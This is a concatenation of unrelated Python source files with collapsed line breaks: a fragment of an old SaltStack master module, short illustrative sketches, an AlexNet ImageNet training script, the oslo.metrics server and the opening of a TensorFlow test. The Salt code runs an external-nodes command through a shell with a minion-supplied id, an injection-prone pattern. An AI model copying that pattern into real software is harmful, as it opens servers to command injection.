''} if env not in self.opts['file_roots']: return fnd for root in self.opts['file_roots'][env]: full = os.path.join(root, path) if os.path.isfile(full): fnd['path'] = full fnd['rel'] = path return fnd return fnd def __verify_minion(self, id_, token): ''' Take a minion id and a string signed with the minion private key The string needs to verify as 'salt' with the minion public key ''' pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_) with open(pub_path, 'r') as fp_: minion_pub = fp_.read() fd_, tmp_pub = tempfile.mkstemp() os.close(fd_) with open(tmp_pub, 'w+') as fp_: fp_.write(minion_pub) pub = None try: pub = RSA.load_pub_key(tmp_pub) except RSA.RSAError, e: log.error('Unable to load temporary public key "{0}": {1}' .format(tmp_pub, e)) try: os.remove(tmp_pub) if pub.public_decrypt(token, 5) == 'salt': return True except RSA.RSAError, e: log.error('Unable to decrypt token: {0}'.format(e)) log.error('Salt minion claiming to be {0} has attempted to' 'communicate with the master and could not be 
verified' .format(id_)) return False def _ext_nodes(self, load): ''' Return the results from an external node classifier if one is specified ''' if not 'id' in load: log.error('Received call for external nodes without an id') return {} if not self.opts['external_nodes']: return {} if not salt.utils.which(self.opts['external_nodes']): log.error(('Specified external nodes controller {0} is not' ' available, please verify that it is installed' '').format(self.opts['external_nodes'])) return {} cmd = '{0} {1}'.format(self.opts['external_nodes'], load['id']) ndata = yaml.safe_load( subprocess.Popen( cmd, shell=True, stdout=subprocess.PIPE ).communicate()[0]) ret = {} if 'environment' in ndata: env = ndata['environment'] else: env = 'base' if 'classes' in ndata: if isinstance(ndata['classes'], dict): ret[env] = list(ndata['classes']) elif isinstance(ndata['classes'], list): ret[env] = ndata['classes'] else: return ret return ret def _serve_file(self, load): ''' Return a chunk from a file based on the data received ''' ret = {'data': '', 'dest': ''} if 'path' not in load or 'loc' not in load or 'env' not in load: return ret fnd = self.__find_file(load['path'], load['env']) if not fnd['path']: return ret ret['dest'] = fnd['rel'] with open(fnd['path'], 'rb') as fp_: fp_.seek(load['loc']) ret['data'] = fp_.read(self.opts['file_buffer_size']) return ret def _file_hash(self, load): ''' Return a file hash, the hash type is set in the master config file ''' if 'path' not in load or 'env' not in load: return '' path = self.__find_file(load['path'], load['env'])['path'] if not path: return {} ret = {} with open(path, 'rb') as fp_: ret['hsum'] = getattr(hashlib, self.opts['hash_type'])( fp_.read()).hexdigest() ret['hash_type'] = self.opts['hash_type'] return ret def _file_list(self, load): ''' Return a list of all files on the file server in a specified environment ''' ret = [] if load['env'] not in self.opts['file_roots']: return ret for path in self.opts['file_roots'][load['env']]: for root, dirs, files in os.walk(path, followlinks=True): for fn in files: ret.append( os.path.relpath( os.path.join( root, fn ), path ) ) return ret def _file_list_emptydirs(self, load): ''' Return a list of all empty directories on the master ''' ret = [] if load['env'] not in self.opts['file_roots']: return ret for path in self.opts['file_roots'][load['env']]: for root, dirs, files in os.walk(path, followlinks=True): if len(dirs) == 0 and len(files) == 0: ret.append(os.path.relpath(root, path)) return ret def _master_opts(self, load): ''' Return the master options to the minion ''' return self.opts def _pillar(self, load): ''' Return the pillar data for the minion ''' if 'id' not in load or 'grains' not in load or 'env' not in load: return False pillar = salt.pillar.Pillar( self.opts, load['grains'], load['id'], load['env']) return pillar.compile_pillar() def _master_state(self, load): ''' Call the master to compile a master side highstate ''' if 'opts' not in load or 'grains' not in load: return False return salt.state.master_compile( self.opts, load['opts'], load['grains'], load['opts']['id'], load['opts']['environment']) def _return(self, load): ''' Handle the return data sent from the minions ''' # If the return data is invalid, just ignore it if 'return' not in load or 'jid' not in load or 'id' not in load: return False log.info('Got return from {0[id]} for job {0[jid]}'.format(load)) self.event.fire_event(load, load['jid']) if not self.opts['job_cache']: return jid_dir = salt.utils.jid_dir( load['jid'], 
self.opts['cachedir'], self.opts['hash_type'] ) if not os.path.isdir(jid_dir): log.error( 'An inconsistency occurred, a job was received with a job id ' 'that is not present on the master: %(jid)s', load ) return False hn_dir = os.path.join(jid_dir, load['id']) if not os.path.isdir(hn_dir): os.makedirs(hn_dir) # Otherwise the minion has already returned this jid and it should # be dropped else: log.error( ('An extra return was detected from minion {0}, please' ' verify the minion, this could be a replay' ' attack').format(load['id']) ) return False self.serial.dump(load['return'], open(os.path.join(hn_dir, 'return.p'), 'w+')) if 'out' in load: self.serial.dump(load['out'], open(os.path.join(hn_dir, 'out.p'), 'w+')) def _syndic_return(self, load): ''' Receive a syndic minion return and format it to look like returns from individual minions. ''' # Verify the load if 'return' not in load or 'jid' not in load or 'id' not in load: return None # set the write flag jid_dir = salt.utils.jid_dir( load['jid'], self.opts['cachedir'], self.opts['hash_type'] ) if not os.path.isdir(jid_dir): log.error( 'An inconsistency occurred, a job was received with a job id ' 'that is not present on the master: %(jid)s', load ) return False wtag = os.path.join(jid_dir, 'wtag_{0}'.format(load['id'])) try: with open(wtag, 'w+') as fp_: fp_.write('') except (IOError, OSError): log.error( ('Failed to commit the write tag for the syndic return,' ' are permissions correct in the cache dir:' ' {0}?').format(self.opts['cachedir']) ) return False # Format individual return loads for key, item in load['return'].items(): ret = {'jid': load['jid'], 'id': key, 'return': item} self._return(ret) if os.path.isfile(wtag): os.remove(wtag) def minion_runner(self, clear_load): ''' Execute a runner from a minion, return the runner's function data ''' if 'peer_run' not in self.opts: return {} if not isinstance(self.opts['peer_run'], dict): return {} if 'fun' not in clear_load\ or 'arg' not in clear_load\ or 'id' not in clear_load\ or 'tok' not in clear_load: return {} if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! msg = 'Minion id {0} is not who it says it is!'.format( clear_load['id']) log.warn(msg) return {} perms = set() for match in self.opts['peer_run']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer_run'][match], list): perms.update(self.opts['peer_run'][match]) good = False for perm in perms: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Prepare the runner object opts = {'fun': clear_load['fun'], 'arg': clear_load['arg'], 'doc': False, 'conf_file': self.opts['conf_file']} opts.update(self.opts) runner = salt.runner.Runner(opts) return runner.run() def minion_publish(self, clear_load): ''' Publish a command initiated from a minion, this method executes minion restrictions so that the minion publication will only work if it is enabled in the config. The configuration on the master allows minions to be matched to salt functions, so the minions can only publish allowed salt functions The config will look like this: peer: .*: - .* This configuration will enable all minions to execute all commands. 
peer: foo.example.com: - test.* This configuration will only allow the minion foo.example.com to execute commands from the test module ''' # Verify that the load is valid if 'peer' not in self.opts: return {} if not isinstance(self.opts['peer'], dict): return {} if 'fun' not in clear_load\ or 'arg' not in clear_load\ or 'tgt' not in clear_load\ or 'ret' not in clear_load\ or 'tok' not in clear_load\ or 'id' not in clear_load: return {} # If the command will make a recursive publish don't run if re.match('publish.*', clear_load['fun']): return {} # Check the permissions for this minion if not self.__verify_minion(clear_load['id'], clear_load['tok']): # The minion is not who it says it is! # We don't want to listen to it! msg = 'Minion id {0} is not who it says it is!'.format( clear_load['id']) log.warn(msg) return {} perms = set() for match in self.opts['peer']: if re.match(match, clear_load['id']): # This is the list of funcs/modules! if isinstance(self.opts['peer'][match], list): perms.update(self.opts['peer'][match]) good = False if ',' in clear_load['fun']: # 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']] clear_load['fun'] = clear_load['fun'].split(',') arg_ = [] for arg in clear_load['arg']: arg_.append(arg.split()) clear_load['arg'] = arg_ for perm in perms: if isinstance(clear_load['fun'], list): good = True for fun in clear_load['fun']: if not re.match(perm, fun): good = False else: if re.match(perm, clear_load['fun']): good = True if not good: return {} # Set up the publication payload jid = salt.utils.prep_jid( self.opts['cachedir'], self.opts['hash_type'] ) load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt_type': clear_load.get('tgt_type', 'glob'), 'tgt': clear_load['tgt'], 'jid': jid, 'ret': clear_load['ret'], 'id': clear_load['id'], } self.serial.dump( load, open( os.path.join( salt.utils.jid_dir( jid, self.opts['cachedir'], self.opts['hash_type'] ), '.load.p' ), 'w+') ) payload = {'enc': 'aes'} expr_form = 'glob' timeout = 5 if 'tmo' in clear_load: try: timeout = int(clear_load['tmo']) except ValueError: msg = 'Failed to parse timeout value: {0}'.format(clear_load['tmo']) log.warn(msg) return {} if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] expr_form = load['tgt_type'] if 'timeout' in clear_load: timeout = clear_load['timeout'] # Encrypt! 
payload['load'] = self.crypticle.dumps(load) # Connect to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) log.info(('Publishing minion job: #{0[jid]}, func: "{0[fun]}", args:' ' "{0[arg]}", target: "{0[tgt]}"').format(load)) pub_sock.send(self.serial.dumps(payload)) # Run the client get_returns method based on the form data sent if 'form' in clear_load: ret_form = clear_load['form'] else: ret_form = 'clean' if ret_form == 'clean': return self.local.get_returns( jid, self.local.check_minions( clear_load['tgt'], expr_form ), timeout ) elif ret_form == 'full': ret = self.local.get_full_returns( jid, self.local.check_minions( clear_load['tgt'], expr_form ), timeout ) ret['__jid__'] = jid return ret def run_func(self, func, load): ''' Wrapper for running functions executed with AES encryption ''' # Don't honor private functions if func.startswith('__'): return self.crypticle.dumps({}) # Run the func try: ret = getattr(self, func)(load) except AttributeError as exc: log.error(('Received function {0} which in unavailable on the ' 'master, returning False').format(exc)) return self.crypticle.dumps(False) # Don't encrypt the return value for the _return func # (we don't care about the return value, so why encrypt it?) if func == '_return': return ret # AES Encrypt the return return self.crypticle.dumps(ret) class ClearFuncs(object): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key, master_key, crypticle): self.opts = opts self.serial = salt.payload.Serial(opts) self.key = key self.master_key = master_key self.crypticle = crypticle # Create the event manager self.event = salt.utils.event.SaltEvent( self.opts['sock_dir'], 'master' ) # Make a client self.local = salt.client.LocalClient(self.opts['conf_file']) def _send_cluster(self): ''' Send the cluster data out ''' log.debug('Sending out cluster data') ret = self.local.cmd(self.opts['cluster_masters'], 'cluster.distrib', self._cluster_load(), 0, 'list' ) log.debug('Cluster distributed: %s', ret) def _cluster_load(self): ''' Generates the data sent to the cluster nodes. ''' minions = {} master_pem = '' with open(self.opts['conf_file'], 'r') as fp_: master_conf = fp_.read() minion_dir = os.path.join(self.opts['pki_dir'], 'minions') for host in os.listdir(minion_dir): pub = os.path.join(minion_dir, host) minions[host] = open(pub, 'r').read() if self.opts['cluster_mode'] == 'full': with open(os.path.join(self.opts['pki_dir'], 'master.pem')) as fp_: master_pem = fp_.read() return [minions, master_conf, master_pem, self.opts['conf_file']] def _auth(self, load): ''' Authenticate the client, use the sent public key to encrypt the aes key which was generated at start up. This method fires an event over the master event manager. The evnt is tagged "auth" and returns a dict with information about the auth event ''' # 1. Verify that the key we are receiving matches the stored key # 2. Store the key if it is not there # 3. make an rsa key with the pub key # 4. encrypt the aes key as an encrypted salt.payload # 5. 
package the return and return it log.info('Authentication request from %(id)s', load) pubfn = os.path.join(self.opts['pki_dir'], 'minions', load['id']) pubfn_pend = os.path.join(self.opts['pki_dir'], 'minions_pre', load['id']) pubfn_rejected = os.path.join(self.opts['pki_dir'], 'minions_rejected', load['id']) if self.opts['open_mode']: # open mode is turned on, nuts to checks and overwrite whatever # is there pass elif os.path.isfile(pubfn): # The key has been accepted check it if not open(pubfn, 'r').read() == load['pub']: log.error( 'Authentication attempt from %(id)s failed, the public ' 'keys did not match. This may be an attempt to compromise ' 'the Salt cluster.', load ) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif os.path.isfile(pubfn_rejected): # The key has been rejected, don't place it in pending log.info('Public key rejected for %(id)s', load) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif not os.path.isfile(pubfn_pend)\ and not self.opts['auto_accept']: # This is a new key, stick it in pre log.info('New public key placed in pending for %(id)s', load) with open(pubfn_pend, 'w+') as fp_: fp_.write(load['pub']) ret = {'enc': 'clear', 'load': {'ret': True}} eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret elif os.path.isfile(pubfn_pend)\ and not self.opts['auto_accept']: # This key is in pending, if it is the same key ret True, else # ret False if not open(pubfn_pend, 'r').read() == load['pub']: log.error( 'Authentication attempt from %(id)s failed, the public ' 'keys in pending did not match. This may be an attempt to ' 'compromise the Salt cluster.', load ) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': False}} else: log.info( 'Authentication failed from host %(id)s, the key is in ' 'pending and needs to be accepted with salt-key -a %(id)s', load ) eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': True}} elif not os.path.isfile(pubfn_pend)\ and self.opts['auto_accept']: # This is a new key and auto_accept is turned on pass else: # Something happened that I have not accounted for, FAIL! 
log.warn('Unaccounted for authentication failure') eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication accepted from %(id)s', load) with open(pubfn, 'w+') as fp_: fp_.write(load['pub']) pub = None # The key payload may sometimes be corrupt when using auto-accept # and an empty request comes in try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError, e: log.error('Corrupt public key "{0}": {1}'.format(pubfn, e)) return {'enc': 'clear', 'load': {'ret': False}} ret = {'enc': 'pub', 'pub_key': self.master_key.get_pub_str(), 'token': self.master_key.token, 'publish_port': self.opts['publish_port'], } ret['aes'] = pub.public_encrypt(self.opts['aes'], 4) eload = {'result': True, 'act': 'accept', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, 'auth') return ret def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' # Verify that the caller has root on master if not clear_load.pop('key') == self.key: return '' jid_dir = salt.utils.jid_dir( clear_load['jid'], self.opts['cachedir'], self.opts['hash_type'] ) # Verify the jid dir if not os.path.isdir(jid_dir): os.makedirs(jid_dir) # Save the invocation information self.serial.dump( clear_load, open(os.path.join(jid_dir, '.load.p'), 'w+') ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'user' in clear_load: log.info(('User {0[user]} Published command {0[fun]} with jid' ' {0[jid]}').format(clear_load)) load['user'] = clear_load['user'] else: log.info(('Published command {0[fun]} with jid' ' {0[jid]}').format(clear_load)) log.debug('Published command details {0}'.format(load)) payload['load'] = self.crypticle.dumps(load) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) pub_sock.send(self.serial.dumps(payload)) return {'enc': 'clear', 'load': {'jid': clear_load['jid']}}
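# Illustrative sketch (not part of master.py above): ReqServer/MWorker use the
# classic pyzmq ROUTER/DEALER broker pattern -- a frontend socket for clients,
# a backend socket for REP workers, and a device/proxy shuttling messages
# between them. A minimal, hedged version with thread workers and hypothetical
# endpoints, not the Salt implementation itself:
import threading

import zmq


def worker(context, url):
    sock = context.socket(zmq.REP)
    sock.connect(url)
    while True:
        msg = sock.recv()
        sock.send(b'ack: ' + msg)


def main():
    context = zmq.Context.instance()
    frontend = context.socket(zmq.ROUTER)   # clients REQ-connect here
    backend = context.socket(zmq.DEALER)    # workers connect here
    frontend.bind('tcp://127.0.0.1:5555')
    backend.bind('inproc://workers')
    for _ in range(4):
        threading.Thread(target=worker, args=(context, 'inproc://workers'),
                         daemon=True).start()
    # zmq.proxy is the newer spelling of the zmq.device(zmq.QUEUE, ...) call
    # used in ReqServer.__bind; both forward requests and replies both ways.
    zmq.proxy(frontend, backend)


if __name__ == '__main__':
    main()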
train.py
""" Written by Matteo Dunnhofer - 2017 models training on ImageNet """ import sys import os.path import time from models import alexnet import tensorflow as tf import train_util as tu import numpy as np import threading def train( epochs, batch_size, learning_rate, dropout, momentum, lmbda, resume, imagenet_path, display_step, test_step, ckpt_path, summary_path): """ Procedure to train the model on ImageNet ILSVRC 2012 training set Args: resume: boolean variable, true if want to resume the training, false to train from scratch imagenet_path: path to ILSRVC12 ImageNet folder containing train images, validation images, annotations and metadata file display_step: number representing how often printing the current training accuracy test_step: number representing how often make a test and print the validation accuracy ckpt_path: path where to save model's tensorflow checkpoint (or from where resume) summary_path: path where to save logs for TensorBoard """ train_img_path = os.path.join(imagenet_path, 'ILSVRC2012_img_train') ts_size = tu.imagenet_size(train_img_path) num_batches = int(float(ts_size) / batch_size) wnid_labels, _ = tu.load_imagenet_meta(os.path.join(imagenet_path, 'data/meta.mat')) x = tf.placeholder(tf.float32, [None, 224, 224, 3]) y = tf.placeholder(tf.float32, [None, 1000]) lr = tf.placeholder(tf.float32) keep_prob = tf.placeholder(tf.float32) # queue of examples being filled on the cpu with tf.device('/gpu:0'): q = tf.FIFOQueue(batch_size * 3, [tf.float32, tf.float32], shapes=[[224, 224, 3], [1000]]) enqueue_op = q.enqueue_many([x, y]) x_b, y_b = q.dequeue_many(batch_size) pred, _ = alexnet.classifier(x_b, keep_prob) # cross-entropy and weight decay with tf.name_scope('cross_entropy'): cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_b, name='cross-entropy')) with tf.name_scope('l2_loss'): l2_loss = tf.reduce_sum(lmbda * tf.stack([tf.nn.l2_loss(v) for v in tf.get_collection('weights')])) tf.summary.scalar('l2_loss', l2_loss) with tf.name_scope('loss'): loss = cross_entropy + l2_loss tf.summary.scalar('loss', loss) # accuracy with tf.name_scope('accuracy'): correct = tf.equal(tf.argmax(pred, 1), tf.argmax(y_b, 1)) accuracy = tf.reduce_mean(tf.cast(correct, tf.float32)) tf.summary.scalar('accuracy', accuracy) global_step = tf.Variable(0, trainable=False) epoch = tf.div(global_step, num_batches) # momentum optimizer with tf.name_scope('optimizer'): optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=momentum).minimize(loss, global_step=global_step) # merge summaries to write them to file merged = tf.summary.merge_all() # checkpoint saver saver = tf.train.Saver() coord = tf.train.Coordinator() #init = tf.initialize_all_variables() init = tf.global_variables_initializer() with tf.Session(config=tf.ConfigProto()) as sess: if resume: saver.restore(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) else: sess.run(init) # enqueuing batches procedure def enqueue_batches(): while not coord.should_stop(): im, l = tu.read_batch(batch_size, train_img_path, wnid_labels) sess.run(enqueue_op, feed_dict={x: im,y: l}) # creating and starting parallel threads to fill the queue num_threads = 3 for i in range(num_threads): t = threading.Thread(target=enqueue_batches) t.setDaemon(True) t.start() # operation to write logs for tensorboard visualization train_writer = tf.summary.FileWriter(os.path.join(summary_path, 'train'), sess.graph) start_time = time.time() for e in range(sess.run(epoch), epochs): for i in range(num_batches): summary_str,_, 
step = sess.run([merged,optimizer, global_step], feed_dict={lr: learning_rate, keep_prob: dropout}) train_writer.add_summary(summary_str, step) # decaying learning rate if step == 170000 or step == 350000: learning_rate /= 10 # display current training informations if step % display_step == 0: c, a = sess.run([loss, accuracy], feed_dict={lr: learning_rate, keep_prob: 1.0}) print ('Epoch: {:03d} Step/Batch: {:09d} --- Loss: {:.7f} Training accuracy: {:.4f}'.format(e, step, c, a)) # make test and evaluate validation accuracy if step % test_step == 0: val_im, val_cls = tu.read_validation_batch(batch_size, os.path.join(imagenet_path, 'ILSVRC2012_img_val'), os.path.join(imagenet_path, 'data/ILSVRC2012_validation_ground_truth.txt')) v_a = sess.run(accuracy, feed_dict={x_b: val_im, y_b: val_cls, lr: learning_rate, keep_prob: 1.0}) # intermediate time int_time = time.time() print ('Elapsed time: {}'.format(tu.format_time(int_time - start_time))) print ('Validation accuracy: {:.04f}'.format(v_a)) # save weights to file save_path = saver.save(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) print('Variables saved in file: %s' % save_path) end_time = time.time() print ('Elapsed time: {}'.format(tu.format_time(end_time - start_time))) save_path = saver.save(sess, os.path.join(ckpt_path, 'alexnet-cnn.ckpt')) print('Variables saved in file: %s' % save_path) coord.request_stop() if __name__ == '__main__': DROPOUT = 0.5 MOMENTUM = 0.9 LAMBDA = 5e-04 # for weight decay LEARNING_RATE = 1e-03 EPOCHS = 90 BATCH_SIZE = 128 CKPT_PATH = 'ckpt-alexnet' if not os.path.exists(CKPT_PATH): os.makedirs(CKPT_PATH) SUMMARY = 'summary' if not os.path.exists(SUMMARY): os.makedirs(SUMMARY) IMAGENET_PATH = 'ILSVRC2012' DISPLAY_STEP = 10 TEST_STEP = 500 if sys.argv[1] == '-resume': resume = True elif sys.argv[1] == '-scratch': resume = False train( EPOCHS, BATCH_SIZE, LEARNING_RATE, DROPOUT, MOMENTUM, LAMBDA, resume, IMAGENET_PATH, DISPLAY_STEP, TEST_STEP, CKPT_PATH, SUMMARY)
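# Illustrative sketch (not part of train.py above): the enqueue_batches /
# tf.train.Coordinator arrangement above is a producer-consumer pipeline in
# which daemon threads keep a bounded queue full while the training loop
# drains it. A minimal, hedged stand-in using only the standard library;
# read_batch below is a hypothetical placeholder for the real data loader:
import queue
import threading
import time


def read_batch():
    time.sleep(0.01)          # pretend to do I/O and preprocessing
    return [0.0] * 128        # hypothetical batch


def feeder(q, stop):
    while not stop.is_set():
        q.put(read_batch())   # blocks when the queue is full (backpressure)


def main():
    q = queue.Queue(maxsize=3)            # bounded, like FIFOQueue(batch_size * 3)
    stop = threading.Event()
    for _ in range(3):                    # num_threads = 3, as in train()
        threading.Thread(target=feeder, args=(q, stop), daemon=True).start()
    for step in range(10):                # stand-in for the training loop
        batch = q.get()
        print('step', step, 'got batch of', len(batch), 'items')
    stop.set()                            # coordinator-style shutdown request


if __name__ == '__main__':
    main()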
__main__.py
# Copyright 2020 LINE Corp. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import select import signal import socket import sys import threading from wsgiref.simple_server import make_server from oslo_config import cfg from oslo_log import log as logging from prometheus_client import make_wsgi_app from oslo_metrics import message_router oslo_metrics_configs = [ cfg.StrOpt('metrics_socket_file', default='/var/tmp/metrics_collector.sock', help='Unix domain socket file to be used' ' to send rpc related metrics'), cfg.IntOpt('prometheus_port', default=3000, help='Port number to expose metrics in prometheus format.'), ] cfg.CONF.register_opts(oslo_metrics_configs, group='oslo_metrics') LOG = logging.getLogger(__name__) CONF = cfg.CONF logging.register_options(CONF) logging.setup(CONF, 'oslo-metrics') LOG.logger.setLevel(logging.DEBUG) class MetricsListener(): def __init__(self, socket_path): self.socket_path = socket_path self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) self.unlink(socket_path) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind(self.socket_path) self.start = True self.router = message_router.MessageRouter() def unlink(self, socket_path): try: os.unlink(socket_path) except OSError: if os.path.exists(socket_path): raise def serve(self): while self.start: readable, writable, exceptional = select.select( [self.socket], [], [], 1) if len(readable) == 0: continue try: LOG.debug("wait for socket.recv") # 1 message size should be smaller than 65565 msg = self.socket.recv(65565) LOG.debug("got message") self.router.process(msg) except socket.timeout: pass def stop(self): self.socket.close() self.start = False httpd = None def handle_sigterm(_signum, _frame): LOG.debug("Caught sigterm") shutdown_thread = threading.Thread(target=httpd.shutdown) shutdown_thread.start() def main(): cfg.CONF(sys.argv[1:]) socket_path = cfg.CONF.oslo_metrics.metrics_socket_file m = MetricsListener(socket_path) try: os.chmod(socket_path, 0o660) except OSError: LOG.error("Changing the mode of the file failed.... continuing") mt = threading.Thread(target=m.serve) LOG.info("Start oslo.metrics") mt.start() app = make_wsgi_app() try: global httpd httpd = make_server('', CONF.oslo_metrics.prometheus_port, app) signal.signal(signal.SIGTERM, handle_sigterm) httpd.serve_forever() except KeyboardInterrupt: pass finally: LOG.info("Try to stop...") os.remove(cfg.CONF.oslo_metrics.metrics_socket_file) m.stop() httpd.server_close() if __name__ == "__main__": main()
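# Illustrative sketch (not part of __main__.py above): MetricsListener.serve()
# is a select()-with-timeout loop over an AF_UNIX datagram socket, so the
# serving thread can notice a stop request even when no metrics arrive. A
# minimal, hedged version using only the standard library; the socket path and
# the print() stand in for the real message router:
import os
import select
import socket

SOCKET_PATH = '/tmp/metrics_sketch.sock'   # hypothetical path


def serve(should_stop):
    if os.path.exists(SOCKET_PATH):
        os.unlink(SOCKET_PATH)
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    sock.bind(SOCKET_PATH)
    try:
        while not should_stop():
            # Wake up once per second so the stop flag is honoured even when
            # the socket stays quiet.
            readable, _, _ = select.select([sock], [], [], 1)
            if not readable:
                continue
            msg = sock.recv(65565)         # one datagram per metric message
            print('received %d bytes' % len(msg))
    finally:
        sock.close()
        os.unlink(SOCKET_PATH)


if __name__ == '__main__':
    serve(lambda: False)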
autocast_variable_test.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for AutoCastVariable.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import threading from absl.testing import parameterized import numpy as np from tensorflow.python import tf2 from tensorflow.python.distribute import combinations as ds_combinations from tensorflow.python.distribute import distribution_strategy_context as ds_context from tensorflow.python.distribute import mirrored_strategy from tensorflow.python.distribute import strategy_combinations from tensorflow.python.distribute import test_util from tensorflow.python.eager import context from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import indexed_slices from tensorflow.python.framework import ops from tensorflow.python.framework import test_combinations as combinations from tensorflow.python.keras.mixed_precision import autocast_variable from tensorflow.python.keras.optimizer_v2 import adadelta from tensorflow.python.keras.optimizer_v2 import adagrad from tensorflow.python.keras.optimizer_v2 import adam from tensorflow.python.keras.optimizer_v2 import adamax from tensorflow.python.keras.optimizer_v2 import ftrl from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2 from tensorflow.python.keras.optimizer_v2 import nadam from tensorflow.python.keras.optimizer_v2 import rmsprop from tensorflow.python.ops import array_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import test from tensorflow.python.training import gradient_descent as gradient_descent_v1 from tensorflow.python.training.tracking import util as trackable_utils maybe_distribute = combinations.combine(distribution=[ strategy_combinations.default_strategy, strategy_combinations.mirrored_strategy_with_cpu_1_and_2 ]) def get_var(val, dtype, name=None): return variables.VariableV1(val, use_resource=True, dtype=dtype, name=name) @ds_combinations.generate(combinations.combine(mode=['graph', 'eager'])) class AutoCastVariableTest(test.TestCase, parameterized.TestCase): def setUp(self): test_util.set_logical_devices_to_at_least('CPU', 3) super(AutoCastVariableTest, self).setUp() @ds_combinations.generate(maybe_distribute) def test_read(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # outside of auto cast scope. 
self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(array_ops.identity(x).dtype, dtypes.float32) # within auto cast scope of different dtype with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float16) self.assertEqual(x.read_value().dtype, dtypes.float16) self.assertEqual(array_ops.identity(x).dtype, dtypes.float16) # within auto cast scope of same dtype with autocast_variable.enable_auto_cast_variables(dtypes.float32): self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(array_ops.identity(x).dtype, dtypes.float32) def test_sparse_reads(self): x = get_var([1., 2], dtypes.float32) # DistributedVariables do not support sparse_read or gather_nd, so we pass # distribute=False x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.assertEqual(x.sparse_read([0]).dtype, dtypes.float32) self.assertEqual(x.gather_nd([0]).dtype, dtypes.float32) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.sparse_read([0]).dtype, dtypes.float16) self.assertEqual(x.gather_nd([0]).dtype, dtypes.float16) @ds_combinations.generate(maybe_distribute) def test_read_nested_scopes(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) 